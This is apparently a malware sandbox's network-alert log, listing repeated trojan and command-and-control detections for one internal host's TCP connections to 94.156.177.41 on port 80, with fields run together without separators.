                2024-11-20T10:11:38.721967+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249175TCP
                2024-11-20T10:11:40.665595+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249176TCP
                2024-11-20T10:11:41.549085+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249177TCP
                2024-11-20T10:11:42.442906+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249178TCP
                2024-11-20T10:11:43.362123+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249179TCP
                2024-11-20T10:11:44.258106+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249180TCP
                2024-11-20T10:11:45.158361+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249181TCP
                2024-11-20T10:11:46.817046+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249182TCP
                2024-11-20T10:11:47.859109+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249183TCP
                2024-11-20T10:11:48.768499+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249184TCP
                2024-11-20T10:11:49.786314+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249185TCP
                2024-11-20T10:11:50.669657+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249186TCP
                2024-11-20T10:11:51.578703+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249187TCP
                2024-11-20T10:11:52.682271+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249188TCP
                2024-11-20T10:11:53.605545+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249189TCP
                2024-11-20T10:11:54.512561+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249190TCP
                2024-11-20T10:11:55.402298+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249191TCP
                2024-11-20T10:11:56.311347+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249192TCP
                2024-11-20T10:11:57.204029+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249193TCP
                2024-11-20T10:11:58.107727+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249194TCP
                2024-11-20T10:11:58.995828+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249195TCP
                2024-11-20T10:11:59.914415+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249196TCP
                2024-11-20T10:12:00.924468+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249197TCP
                2024-11-20T10:12:01.969084+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249198TCP
                2024-11-20T10:12:03.007930+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249199TCP
                2024-11-20T10:12:04.035992+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249200TCP
                2024-11-20T10:12:05.070422+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249201TCP
                2024-11-20T10:12:05.963806+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249202TCP
                2024-11-20T10:12:06.854208+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249203TCP
                2024-11-20T10:12:07.741514+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249204TCP
                2024-11-20T10:12:08.615371+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249205TCP
                2024-11-20T10:12:09.492422+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249206TCP
                2024-11-20T10:12:10.494091+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249207TCP
                2024-11-20T10:12:11.411925+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249208TCP
                2024-11-20T10:12:12.427402+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249209TCP
                2024-11-20T10:12:13.489277+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249210TCP
                2024-11-20T10:12:14.386020+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249211TCP
                2024-11-20T10:12:15.548693+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249212TCP
                2024-11-20T10:12:16.548175+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249213TCP
                2024-11-20T10:12:17.581516+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249214TCP
                2024-11-20T10:12:18.607117+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249215TCP
                2024-11-20T10:12:20.254986+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249216TCP
                2024-11-20T10:12:21.124909+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249217TCP
                2024-11-20T10:12:22.175233+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249218TCP
                2024-11-20T10:12:23.277419+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249219TCP
                2024-11-20T10:12:24.155302+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249220TCP
                2024-11-20T10:12:25.204348+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249221TCP
                2024-11-20T10:12:26.125401+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249222TCP
                2024-11-20T10:12:27.026766+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249223TCP
                2024-11-20T10:12:27.977194+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249224TCP
                2024-11-20T10:12:28.862681+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249225TCP
                2024-11-20T10:12:29.833483+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249226TCP
                2024-11-20T10:12:30.836788+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249227TCP
                2024-11-20T10:12:31.866393+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249228TCP
                2024-11-20T10:12:32.804698+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249229TCP
                2024-11-20T10:12:33.734312+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249230TCP
                2024-11-20T10:12:34.652151+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249231TCP
                2024-11-20T10:12:35.510221+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249232TCP
                2024-11-20T10:12:36.382089+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249233TCP
                2024-11-20T10:12:37.254017+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249234TCP
                2024-11-20T10:12:38.156608+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249235TCP
                2024-11-20T10:12:39.040738+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249236TCP
                2024-11-20T10:12:40.087453+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249237TCP
                2024-11-20T10:12:41.006067+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249238TCP
                2024-11-20T10:12:41.933396+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249239TCP
                2024-11-20T10:12:42.947066+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249240TCP
                2024-11-20T10:12:43.965760+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249241TCP
                2024-11-20T10:12:45.167988+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249242TCP
                2024-11-20T10:12:46.066783+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249243TCP
                2024-11-20T10:12:46.968414+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249244TCP
                2024-11-20T10:12:48.042569+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249245TCP
                2024-11-20T10:12:48.948748+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249246TCP
                2024-11-20T10:12:50.039447+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249247TCP
                2024-11-20T10:12:51.002482+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249248TCP
                2024-11-20T10:12:51.895820+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249249TCP
                2024-11-20T10:12:52.945428+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249250TCP
                2024-11-20T10:12:54.059285+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249251TCP
                2024-11-20T10:12:55.073293+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249252TCP
                2024-11-20T10:12:55.961425+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249253TCP
                2024-11-20T10:12:56.849610+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249254TCP
                2024-11-20T10:12:57.768461+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249255TCP
                2024-11-20T10:12:58.804070+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249256TCP
                2024-11-20T10:12:59.724299+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249257TCP
                2024-11-20T10:13:00.720255+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249258TCP
                2024-11-20T10:13:01.618232+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249259TCP
                2024-11-20T10:13:02.706048+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249260TCP
                2024-11-20T10:13:03.734512+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249261TCP
                2024-11-20T10:13:04.655379+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249262TCP
                2024-11-20T10:13:05.559942+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249263TCP
                2024-11-20T10:13:06.568943+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249264TCP
                2024-11-20T10:13:07.572722+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249265TCP
                2024-11-20T10:13:08.454411+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249266TCP
                2024-11-20T10:13:09.336370+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249267TCP
                2024-11-20T10:13:10.224675+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249268TCP
                2024-11-20T10:13:11.239377+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249269TCP
                2024-11-20T10:13:12.133372+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249270TCP
                2024-11-20T10:13:13.154951+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249271TCP
                2024-11-20T10:13:14.053593+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249272TCP
                2024-11-20T10:13:14.931750+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249273TCP
                2024-11-20T10:13:15.934392+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249274TCP
                2024-11-20T10:13:16.839438+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249275TCP
                2024-11-20T10:13:17.908765+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249276TCP
                2024-11-20T10:13:18.840854+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249277TCP
                2024-11-20T10:13:19.886547+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249278TCP
                2024-11-20T10:13:20.791119+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249279TCP
                2024-11-20T10:13:21.870501+010020254831A Network Trojan was detected94.156.177.4180192.168.2.2249280TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T10:11:36.639270+010020243131Malware Command and Control Activity Detected192.168.2.224917394.156.177.4180TCP
                2024-11-20T10:11:37.678741+010020243131Malware Command and Control Activity Detected192.168.2.224917494.156.177.4180TCP
                2024-11-20T10:11:38.716249+010020243131Malware Command and Control Activity Detected192.168.2.224917594.156.177.4180TCP
                2024-11-20T10:11:40.657533+010020243131Malware Command and Control Activity Detected192.168.2.224917694.156.177.4180TCP
                2024-11-20T10:11:41.542743+010020243131Malware Command and Control Activity Detected192.168.2.224917794.156.177.4180TCP
                2024-11-20T10:11:42.435169+010020243131Malware Command and Control Activity Detected192.168.2.224917894.156.177.4180TCP
                2024-11-20T10:11:43.357085+010020243131Malware Command and Control Activity Detected192.168.2.224917994.156.177.4180TCP
                2024-11-20T10:11:44.250418+010020243131Malware Command and Control Activity Detected192.168.2.224918094.156.177.4180TCP
                2024-11-20T10:11:45.152866+010020243131Malware Command and Control Activity Detected192.168.2.224918194.156.177.4180TCP
                2024-11-20T10:11:46.807743+010020243131Malware Command and Control Activity Detected192.168.2.224918294.156.177.4180TCP
                2024-11-20T10:11:47.853851+010020243131Malware Command and Control Activity Detected192.168.2.224918394.156.177.4180TCP
                2024-11-20T10:11:48.762372+010020243131Malware Command and Control Activity Detected192.168.2.224918494.156.177.4180TCP
                2024-11-20T10:11:49.780927+010020243131Malware Command and Control Activity Detected192.168.2.224918594.156.177.4180TCP
                2024-11-20T10:11:50.661713+010020243131Malware Command and Control Activity Detected192.168.2.224918694.156.177.4180TCP
                2024-11-20T10:11:51.563928+010020243131Malware Command and Control Activity Detected192.168.2.224918794.156.177.4180TCP
                2024-11-20T10:11:52.677319+010020243131Malware Command and Control Activity Detected192.168.2.224918894.156.177.4180TCP
                2024-11-20T10:11:53.596271+010020243131Malware Command and Control Activity Detected192.168.2.224918994.156.177.4180TCP
                2024-11-20T10:11:54.506581+010020243131Malware Command and Control Activity Detected192.168.2.224919094.156.177.4180TCP
                2024-11-20T10:11:55.397349+010020243131Malware Command and Control Activity Detected192.168.2.224919194.156.177.4180TCP
                2024-11-20T10:11:56.305736+010020243131Malware Command and Control Activity Detected192.168.2.224919294.156.177.4180TCP
                2024-11-20T10:11:57.196530+010020243131Malware Command and Control Activity Detected192.168.2.224919394.156.177.4180TCP
                2024-11-20T10:11:58.102470+010020243131Malware Command and Control Activity Detected192.168.2.224919494.156.177.4180TCP
                2024-11-20T10:11:58.990871+010020243131Malware Command and Control Activity Detected192.168.2.224919594.156.177.4180TCP
                2024-11-20T10:11:59.906870+010020243131Malware Command and Control Activity Detected192.168.2.224919694.156.177.4180TCP
                2024-11-20T10:12:00.919609+010020243131Malware Command and Control Activity Detected192.168.2.224919794.156.177.4180TCP
                2024-11-20T10:12:01.961464+010020243131Malware Command and Control Activity Detected192.168.2.224919894.156.177.4180TCP
                2024-11-20T10:12:03.002110+010020243131Malware Command and Control Activity Detected192.168.2.224919994.156.177.4180TCP
                2024-11-20T10:12:04.030990+010020243131Malware Command and Control Activity Detected192.168.2.224920094.156.177.4180TCP
                2024-11-20T10:12:05.064968+010020243131Malware Command and Control Activity Detected192.168.2.224920194.156.177.4180TCP
                2024-11-20T10:12:05.957357+010020243131Malware Command and Control Activity Detected192.168.2.224920294.156.177.4180TCP
                2024-11-20T10:12:06.846240+010020243131Malware Command and Control Activity Detected192.168.2.224920394.156.177.4180TCP
                2024-11-20T10:12:07.734502+010020243131Malware Command and Control Activity Detected192.168.2.224920494.156.177.4180TCP
                2024-11-20T10:12:08.610456+010020243131Malware Command and Control Activity Detected192.168.2.224920594.156.177.4180TCP
                2024-11-20T10:12:09.486250+010020243131Malware Command and Control Activity Detected192.168.2.224920694.156.177.4180TCP
                2024-11-20T10:12:10.489003+010020243131Malware Command and Control Activity Detected192.168.2.224920794.156.177.4180TCP
                2024-11-20T10:12:11.403681+010020243131Malware Command and Control Activity Detected192.168.2.224920894.156.177.4180TCP
                2024-11-20T10:12:12.422371+010020243131Malware Command and Control Activity Detected192.168.2.224920994.156.177.4180TCP
                2024-11-20T10:12:13.483743+010020243131Malware Command and Control Activity Detected192.168.2.224921094.156.177.4180TCP
                2024-11-20T10:12:14.380737+010020243131Malware Command and Control Activity Detected192.168.2.224921194.156.177.4180TCP
                2024-11-20T10:12:15.543328+010020243131Malware Command and Control Activity Detected192.168.2.224921294.156.177.4180TCP
                2024-11-20T10:12:16.542989+010020243131Malware Command and Control Activity Detected192.168.2.224921394.156.177.4180TCP
                2024-11-20T10:12:17.576303+010020243131Malware Command and Control Activity Detected192.168.2.224921494.156.177.4180TCP
                2024-11-20T10:12:18.599605+010020243131Malware Command and Control Activity Detected192.168.2.224921594.156.177.4180TCP
                2024-11-20T10:12:20.249895+010020243131Malware Command and Control Activity Detected192.168.2.224921694.156.177.4180TCP
                2024-11-20T10:12:21.119620+010020243131Malware Command and Control Activity Detected192.168.2.224921794.156.177.4180TCP
                2024-11-20T10:12:22.167325+010020243131Malware Command and Control Activity Detected192.168.2.224921894.156.177.4180TCP
                2024-11-20T10:12:23.270065+010020243131Malware Command and Control Activity Detected192.168.2.224921994.156.177.4180TCP
                2024-11-20T10:12:24.148409+010020243131Malware Command and Control Activity Detected192.168.2.224922094.156.177.4180TCP
                2024-11-20T10:12:25.196987+010020243131Malware Command and Control Activity Detected192.168.2.224922194.156.177.4180TCP
                2024-11-20T10:12:26.119853+010020243131Malware Command and Control Activity Detected192.168.2.224922294.156.177.4180TCP
                2024-11-20T10:12:27.018600+010020243131Malware Command and Control Activity Detected192.168.2.224922394.156.177.4180TCP
                2024-11-20T10:12:27.971248+010020243131Malware Command and Control Activity Detected192.168.2.224922494.156.177.4180TCP
                2024-11-20T10:12:28.855102+010020243131Malware Command and Control Activity Detected192.168.2.224922594.156.177.4180TCP
                2024-11-20T10:12:29.827691+010020243131Malware Command and Control Activity Detected192.168.2.224922694.156.177.4180TCP
                2024-11-20T10:12:30.830951+010020243131Malware Command and Control Activity Detected192.168.2.224922794.156.177.4180TCP
                2024-11-20T10:12:31.861416+010020243131Malware Command and Control Activity Detected192.168.2.224922894.156.177.4180TCP
                2024-11-20T10:12:32.777327+010020243131Malware Command and Control Activity Detected192.168.2.224922994.156.177.4180TCP
                2024-11-20T10:12:33.728123+010020243131Malware Command and Control Activity Detected192.168.2.224923094.156.177.4180TCP
                2024-11-20T10:12:34.632717+010020243131Malware Command and Control Activity Detected192.168.2.224923194.156.177.4180TCP
                2024-11-20T10:12:35.505221+010020243131Malware Command and Control Activity Detected192.168.2.224923294.156.177.4180TCP
                2024-11-20T10:12:36.376039+010020243131Malware Command and Control Activity Detected192.168.2.224923394.156.177.4180TCP
                2024-11-20T10:12:37.246761+010020243131Malware Command and Control Activity Detected192.168.2.224923494.156.177.4180TCP
                2024-11-20T10:12:38.148405+010020243131Malware Command and Control Activity Detected192.168.2.224923594.156.177.4180TCP
                2024-11-20T10:12:39.034887+010020243131Malware Command and Control Activity Detected192.168.2.224923694.156.177.4180TCP
                2024-11-20T10:12:40.082470+010020243131Malware Command and Control Activity Detected192.168.2.224923794.156.177.4180TCP
                2024-11-20T10:12:40.998967+010020243131Malware Command and Control Activity Detected192.168.2.224923894.156.177.4180TCP
                2024-11-20T10:12:41.926270+010020243131Malware Command and Control Activity Detected192.168.2.224923994.156.177.4180TCP
                2024-11-20T10:12:42.940058+010020243131Malware Command and Control Activity Detected192.168.2.224924094.156.177.4180TCP
                2024-11-20T10:12:43.960547+010020243131Malware Command and Control Activity Detected192.168.2.224924194.156.177.4180TCP
                2024-11-20T10:12:45.163042+010020243131Malware Command and Control Activity Detected192.168.2.224924294.156.177.4180TCP
                2024-11-20T10:12:46.061782+010020243131Malware Command and Control Activity Detected192.168.2.224924394.156.177.4180TCP
                2024-11-20T10:12:46.952281+010020243131Malware Command and Control Activity Detected192.168.2.224924494.156.177.4180TCP
                2024-11-20T10:12:48.035363+010020243131Malware Command and Control Activity Detected192.168.2.224924594.156.177.4180TCP
                2024-11-20T10:12:48.943612+010020243131Malware Command and Control Activity Detected192.168.2.224924694.156.177.4180TCP
                2024-11-20T10:12:50.033391+010020243131Malware Command and Control Activity Detected192.168.2.224924794.156.177.4180TCP
                2024-11-20T10:12:50.995621+010020243131Malware Command and Control Activity Detected192.168.2.224924894.156.177.4180TCP
                2024-11-20T10:12:51.871431+010020243131Malware Command and Control Activity Detected192.168.2.224924994.156.177.4180TCP
                2024-11-20T10:12:52.935942+010020243131Malware Command and Control Activity Detected192.168.2.224925094.156.177.4180TCP
                2024-11-20T10:12:54.054313+010020243131Malware Command and Control Activity Detected192.168.2.224925194.156.177.4180TCP
                2024-11-20T10:12:55.068247+010020243131Malware Command and Control Activity Detected192.168.2.224925294.156.177.4180TCP
                2024-11-20T10:12:55.953617+010020243131Malware Command and Control Activity Detected192.168.2.224925394.156.177.4180TCP
                2024-11-20T10:12:56.843900+010020243131Malware Command and Control Activity Detected192.168.2.224925494.156.177.4180TCP
                2024-11-20T10:12:57.763167+010020243131Malware Command and Control Activity Detected192.168.2.224925594.156.177.4180TCP
                2024-11-20T10:12:58.781339+010020243131Malware Command and Control Activity Detected192.168.2.224925694.156.177.4180TCP
                2024-11-20T10:12:59.717917+010020243131Malware Command and Control Activity Detected192.168.2.224925794.156.177.4180TCP
                2024-11-20T10:13:00.715397+010020243131Malware Command and Control Activity Detected192.168.2.224925894.156.177.4180TCP
                2024-11-20T10:13:01.604317+010020243131Malware Command and Control Activity Detected192.168.2.224925994.156.177.4180TCP
                2024-11-20T10:13:02.699741+010020243131Malware Command and Control Activity Detected192.168.2.224926094.156.177.4180TCP
                2024-11-20T10:13:03.729524+010020243131Malware Command and Control Activity Detected192.168.2.224926194.156.177.4180TCP
                2024-11-20T10:13:04.648130+010020243131Malware Command and Control Activity Detected192.168.2.224926294.156.177.4180TCP
                2024-11-20T10:13:05.554936+010020243131Malware Command and Control Activity Detected192.168.2.224926394.156.177.4180TCP
                2024-11-20T10:13:06.564082+010020243131Malware Command and Control Activity Detected192.168.2.224926494.156.177.4180TCP
                2024-11-20T10:13:07.564936+010020243131Malware Command and Control Activity Detected192.168.2.224926594.156.177.4180TCP
                2024-11-20T10:13:08.449519+010020243131Malware Command and Control Activity Detected192.168.2.224926694.156.177.4180TCP
                2024-11-20T10:13:09.331162+010020243131Malware Command and Control Activity Detected192.168.2.224926794.156.177.4180TCP
                2024-11-20T10:13:10.215842+010020243131Malware Command and Control Activity Detected192.168.2.224926894.156.177.4180TCP
                2024-11-20T10:13:11.234165+010020243131Malware Command and Control Activity Detected192.168.2.224926994.156.177.4180TCP
                2024-11-20T10:13:12.128276+010020243131Malware Command and Control Activity Detected192.168.2.224927094.156.177.4180TCP
                2024-11-20T10:13:13.149900+010020243131Malware Command and Control Activity Detected192.168.2.224927194.156.177.4180TCP
                2024-11-20T10:13:14.047995+010020243131Malware Command and Control Activity Detected192.168.2.224927294.156.177.4180TCP
                2024-11-20T10:13:14.921761+010020243131Malware Command and Control Activity Detected192.168.2.224927394.156.177.4180TCP
                2024-11-20T10:13:15.927413+010020243131Malware Command and Control Activity Detected192.168.2.224927494.156.177.4180TCP
                2024-11-20T10:13:16.829314+010020243131Malware Command and Control Activity Detected192.168.2.224927594.156.177.4180TCP
                2024-11-20T10:13:17.903807+010020243131Malware Command and Control Activity Detected192.168.2.224927694.156.177.4180TCP
                2024-11-20T10:13:18.831570+010020243131Malware Command and Control Activity Detected192.168.2.224927794.156.177.4180TCP
                2024-11-20T10:13:19.881369+010020243131Malware Command and Control Activity Detected192.168.2.224927894.156.177.4180TCP
                2024-11-20T10:13:20.786261+010020243131Malware Command and Control Activity Detected192.168.2.224927994.156.177.4180TCP
                2024-11-20T10:13:21.865363+010020243131Malware Command and Control Activity Detected192.168.2.224928094.156.177.4180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T10:11:36.639270+010020243181Malware Command and Control Activity Detected192.168.2.224917394.156.177.4180TCP
                2024-11-20T10:11:37.678741+010020243181Malware Command and Control Activity Detected192.168.2.224917494.156.177.4180TCP
                2024-11-20T10:11:38.716249+010020243181Malware Command and Control Activity Detected192.168.2.224917594.156.177.4180TCP
                2024-11-20T10:11:40.657533+010020243181Malware Command and Control Activity Detected192.168.2.224917694.156.177.4180TCP
                2024-11-20T10:11:41.542743+010020243181Malware Command and Control Activity Detected192.168.2.224917794.156.177.4180TCP
                2024-11-20T10:11:42.435169+010020243181Malware Command and Control Activity Detected192.168.2.224917894.156.177.4180TCP
                2024-11-20T10:11:43.357085+010020243181Malware Command and Control Activity Detected192.168.2.224917994.156.177.4180TCP
                2024-11-20T10:11:44.250418+010020243181Malware Command and Control Activity Detected192.168.2.224918094.156.177.4180TCP
                2024-11-20T10:11:45.152866+010020243181Malware Command and Control Activity Detected192.168.2.224918194.156.177.4180TCP
                2024-11-20T10:11:46.807743+010020243181Malware Command and Control Activity Detected192.168.2.224918294.156.177.4180TCP
                2024-11-20T10:11:47.853851+010020243181Malware Command and Control Activity Detected192.168.2.224918394.156.177.4180TCP
                2024-11-20T10:11:48.762372+010020243181Malware Command and Control Activity Detected192.168.2.224918494.156.177.4180TCP
                2024-11-20T10:11:49.780927+010020243181Malware Command and Control Activity Detected192.168.2.224918594.156.177.4180TCP
                2024-11-20T10:11:50.661713+010020243181Malware Command and Control Activity Detected192.168.2.224918694.156.177.4180TCP
                2024-11-20T10:11:51.563928+010020243181Malware Command and Control Activity Detected192.168.2.224918794.156.177.4180TCP
                2024-11-20T10:11:52.677319+010020243181Malware Command and Control Activity Detected192.168.2.224918894.156.177.4180TCP
                2024-11-20T10:11:53.596271+010020243181Malware Command and Control Activity Detected192.168.2.224918994.156.177.4180TCP
                2024-11-20T10:11:54.506581+010020243181Malware Command and Control Activity Detected192.168.2.224919094.156.177.4180TCP
                2024-11-20T10:11:55.397349+010020243181Malware Command and Control Activity Detected192.168.2.224919194.156.177.4180TCP
                2024-11-20T10:11:56.305736+010020243181Malware Command and Control Activity Detected192.168.2.224919294.156.177.4180TCP
                2024-11-20T10:11:57.196530+010020243181Malware Command and Control Activity Detected192.168.2.224919394.156.177.4180TCP
                2024-11-20T10:11:58.102470+010020243181Malware Command and Control Activity Detected192.168.2.224919494.156.177.4180TCP
                2024-11-20T10:11:58.990871+010020243181Malware Command and Control Activity Detected192.168.2.224919594.156.177.4180TCP
                2024-11-20T10:11:59.906870+010020243181Malware Command and Control Activity Detected192.168.2.224919694.156.177.4180TCP
                2024-11-20T10:12:00.919609+010020243181Malware Command and Control Activity Detected192.168.2.224919794.156.177.4180TCP
                2024-11-20T10:12:01.961464+010020243181Malware Command and Control Activity Detected192.168.2.224919894.156.177.4180TCP
                2024-11-20T10:12:03.002110+010020243181Malware Command and Control Activity Detected192.168.2.224919994.156.177.4180TCP
                2024-11-20T10:12:04.030990+010020243181Malware Command and Control Activity Detected192.168.2.224920094.156.177.4180TCP
                2024-11-20T10:12:05.064968+010020243181Malware Command and Control Activity Detected192.168.2.224920194.156.177.4180TCP
                2024-11-20T10:12:05.957357+010020243181Malware Command and Control Activity Detected192.168.2.224920294.156.177.4180TCP
                2024-11-20T10:12:06.846240+010020243181Malware Command and Control Activity Detected192.168.2.224920394.156.177.4180TCP
                2024-11-20T10:12:07.734502+010020243181Malware Command and Control Activity Detected192.168.2.224920494.156.177.4180TCP
                2024-11-20T10:12:08.610456+010020243181Malware Command and Control Activity Detected192.168.2.224920594.156.177.4180TCP
                2024-11-20T10:12:09.486250+010020243181Malware Command and Control Activity Detected192.168.2.224920694.156.177.4180TCP
                2024-11-20T10:12:10.489003+010020243181Malware Command and Control Activity Detected192.168.2.224920794.156.177.4180TCP
                2024-11-20T10:12:11.403681+010020243181Malware Command and Control Activity Detected192.168.2.224920894.156.177.4180TCP
                2024-11-20T10:12:12.422371+010020243181Malware Command and Control Activity Detected192.168.2.224920994.156.177.4180TCP
                2024-11-20T10:12:13.483743+010020243181Malware Command and Control Activity Detected192.168.2.224921094.156.177.4180TCP
                2024-11-20T10:12:14.380737+010020243181Malware Command and Control Activity Detected192.168.2.224921194.156.177.4180TCP
                2024-11-20T10:12:15.543328+010020243181Malware Command and Control Activity Detected192.168.2.224921294.156.177.4180TCP
                2024-11-20T10:12:16.542989+010020243181Malware Command and Control Activity Detected192.168.2.224921394.156.177.4180TCP
                2024-11-20T10:12:17.576303+010020243181Malware Command and Control Activity Detected192.168.2.224921494.156.177.4180TCP
                2024-11-20T10:12:18.599605+010020243181Malware Command and Control Activity Detected192.168.2.224921594.156.177.4180TCP
                2024-11-20T10:12:20.249895+010020243181Malware Command and Control Activity Detected192.168.2.224921694.156.177.4180TCP
                2024-11-20T10:12:21.119620+010020243181Malware Command and Control Activity Detected192.168.2.224921794.156.177.4180TCP
                2024-11-20T10:12:22.167325+010020243181Malware Command and Control Activity Detected192.168.2.224921894.156.177.4180TCP
                2024-11-20T10:12:23.270065+010020243181Malware Command and Control Activity Detected192.168.2.224921994.156.177.4180TCP
                2024-11-20T10:12:24.148409+010020243181Malware Command and Control Activity Detected192.168.2.224922094.156.177.4180TCP
                2024-11-20T10:12:25.196987+010020243181Malware Command and Control Activity Detected192.168.2.224922194.156.177.4180TCP
                2024-11-20T10:12:26.119853+010020243181Malware Command and Control Activity Detected192.168.2.224922294.156.177.4180TCP
                2024-11-20T10:12:27.018600+010020243181Malware Command and Control Activity Detected192.168.2.224922394.156.177.4180TCP
                2024-11-20T10:12:27.971248+010020243181Malware Command and Control Activity Detected192.168.2.224922494.156.177.4180TCP
                2024-11-20T10:12:28.855102+010020243181Malware Command and Control Activity Detected192.168.2.224922594.156.177.4180TCP
                2024-11-20T10:12:29.827691+010020243181Malware Command and Control Activity Detected192.168.2.224922694.156.177.4180TCP
                2024-11-20T10:12:30.830951+010020243181Malware Command and Control Activity Detected192.168.2.224922794.156.177.4180TCP
                2024-11-20T10:12:31.861416+010020243181Malware Command and Control Activity Detected192.168.2.224922894.156.177.4180TCP
                2024-11-20T10:12:32.777327+010020243181Malware Command and Control Activity Detected192.168.2.224922994.156.177.4180TCP
                2024-11-20T10:12:33.728123+010020243181Malware Command and Control Activity Detected192.168.2.224923094.156.177.4180TCP
                2024-11-20T10:12:34.632717+010020243181Malware Command and Control Activity Detected192.168.2.224923194.156.177.4180TCP
                2024-11-20T10:12:35.505221+010020243181Malware Command and Control Activity Detected192.168.2.224923294.156.177.4180TCP
                2024-11-20T10:12:36.376039+010020243181Malware Command and Control Activity Detected192.168.2.224923394.156.177.4180TCP
                2024-11-20T10:12:37.246761+010020243181Malware Command and Control Activity Detected192.168.2.224923494.156.177.4180TCP
                2024-11-20T10:12:38.148405+010020243181Malware Command and Control Activity Detected192.168.2.224923594.156.177.4180TCP
